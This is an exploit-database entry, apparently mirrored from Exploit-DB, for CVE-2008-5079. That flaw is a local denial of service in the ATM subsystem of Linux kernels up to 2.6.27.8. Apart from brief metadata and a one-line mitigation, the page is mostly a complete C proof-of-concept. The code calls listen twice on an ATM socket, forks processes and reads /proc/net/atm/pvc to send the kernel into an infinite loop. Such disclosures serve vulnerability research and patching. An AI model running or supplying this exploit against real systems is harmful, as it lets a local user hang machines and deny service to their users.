Linux Kernel - exploit.company

vendor:

Linux Kernel

by:

Jon Oberheide

7.2

CVSS

HIGH

Denial of Service

399

CWE

Product Name: Linux Kernel

Affected Version From: 2.6.27.8

Affected Version To: 2.6.27.8

Patch Exists: YES

Related CWE: CVE-2008-5079

CPE: o:linux:linux_kernel

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-0053/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-5079/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-0021/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2008

Linux Kernel <= 2.6.27.8 ATMSVC local DoS

net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8 and earlier allows local users to cause a denial of service (kernel infinite loop) by making two calls to svc_listen for the same socket, and then reading a /proc/net/atm/*vc file, related to corruption of the vcc table.

Mitigation:

Apply the latest security patches and updates to the Linux kernel.

Source

Exploit-DB raw data:

/*
 * cve-2008-5079.c
 *
 * Linux Kernel <= 2.6.27.8 ATMSVC local DoS
 * Jon Oberheide <jon@oberheide.org>
 *
 * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:
 *
 *   net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8
 *   and earlier allows local users to cause a denial of service  
 *   (kernel infinite loop) by making two calls to svc_listen for the
 *   same socket, and then reading a /proc/net/atm/*vc file, related  
 *   to corruption of the vcc table.  
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
 
#define NR_CPUS 8
#define PROC_ATM "/proc/net/atm/pvc"
 
int
main(void)
{
    char *err, dummy[1024];
    int i, ret, sock, proc;
    struct atm_qos qos;
    struct sockaddr_atmsvc addr;
 
    printf("[+] creating ATM socket...\n");
 
    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
    if (sock < 0) {
        err = "socket(2) for type PF_ATMSVC failed";
        printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
 
    memset(&qos, 0, sizeof(qos));
    qos.rxtp.traffic_class = ATM_UBR;
    qos.txtp.traffic_class = ATM_UBR;
    qos.aal = ATM_NO_AAL;
 
    printf("[+] setting socket QoS options...\n");
 
    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));
    if (ret == -1) {
        err = "setsockopt(2) for option SO_ATMQOS failed";
        printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
 
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;
 
    printf("[+] binding socket...\n");
 
    bind(sock, (struct sockaddr *) &addr, sizeof(addr));
 
    printf("[+] socket listen...\n");
 
    listen(sock, 10);
 
    printf("[+] duplicate socket listen...\n");
 
    listen(sock, 10);
 
    printf("[+] attempting local DoS...\n");
 
    for (i = 0; i < NR_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
 
    proc = open(PROC_ATM, O_RDONLY);
    if (proc == -1) {
        err = "opening " PROC_ATM " failed";
        printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    ret = read(proc, &dummy, 1024);
    close(proc);
    
    printf("[-] Local DoS failed.\n");
 
    return 0;
}

// milw0rm.com [2008-12-10]